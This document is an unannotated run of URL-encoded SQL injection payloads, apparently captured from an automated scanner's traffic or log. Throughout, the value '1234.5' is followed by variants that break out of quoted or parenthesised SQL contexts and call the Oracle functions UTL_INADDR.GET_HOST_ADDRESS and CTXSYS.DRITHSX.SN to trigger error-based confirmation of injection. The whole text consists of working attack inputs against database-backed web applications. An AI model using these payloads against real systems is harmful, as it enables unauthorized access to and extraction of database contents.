1234.5%22%29%29%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%22xQHT%22%20LIKE%20%22xQHT 1234.5%22%29%29%29%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%22juVh%22%20LIKE%20%22juVh 1234.5%22%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%22gLNh%22%20LIKE%20%22gLNh 1234.5%25%27%29%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%27AYYi%27%3D%27AYYi 1234.5%00%27%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%27jcNx%27%3D%27jcNx 1234.5%27%29%20WHERE%204908%3D4908%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20--%20 1234.5%22%29%20WHERE%202560%3D2560%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20--%20 1234.5%29%20WHERE%208004%3D8004%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20--%20 1234.5%27%20WHERE%207357%3D7357%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20--%20 1234.5%22%20WHERE%206928%3D6928%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20--%20 1234.5%20WHERE%207068%3D7068%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20--%20 1234.5%27%7C%7C%28SELECT%20%27UaEB%27%20FROM%20DUAL%20WHERE%208740%3D8740%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27irTD%27%20WHERE%209600%3D9600%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20CjMc%20WHERE%207835%3D7835%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27XtYG%27%20WHERE%206861%3D6861%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20%23 1234.5%29%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29 1234.5%27%29%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29 1234.5%27%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29 1234.5%22%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29 1234.5%29%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%288966%3D8966 1234.5%29%29%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%284710%3D4710 1234.5%29%29%29%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%287001%3D7001 1234.5%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29 1234.5%27%29%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27qvtW%27%3D%27qvtW 1234.5%27%29%29%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27RBav%27%3D%27RBav 1234.5%27%29%29%29%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27JdMx%27%3D%27JdMx 1234.5%27%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%27VvQl%27%3D%27VvQl 1234.5%27%29%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27BZfM%27%20LIKE%20%27BZfM 1234.5%27%29%29%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27CzhY%27%20LIKE%20%27CzhY 1234.5%27%29%29%29%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27QcTc%27%20LIKE%20%27QcTc 1234.5%27%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%27uiBs%27%20LIKE%20%27uiBs 1234.5%22%29%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%22ceMb%22%3D%22ceMb 1234.5%22%29%29%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%22MoIT%22%3D%22MoIT 1234.5%22%29%29%29%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%22skPW%22%3D%22skPW 1234.5%22%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%22iZQb%22%3D%22iZQb 1234.5%22%29%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%22EsAG%22%20LIKE%20%22EsAG 1234.5%22%29%29%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%22loCT%22%20LIKE%20%22loCT 1234.5%22%29%29%29%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%22qQRJ%22%20LIKE%20%22qQRJ 1234.5%22%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%22InGP%22%20LIKE%20%22InGP 1234.5%25%27%29%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27klIE%27%3D%27klIE 1234.5%00%27%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%27iByb%27%3D%27iByb 1234.5%27%29%20WHERE%204437%3D4437%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20--%20 1234.5%22%29%20WHERE%209465%3D9465%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20--%20 1234.5%29%20WHERE%207318%3D7318%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20--%20 1234.5%27%20WHERE%206196%3D6196%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20--%20 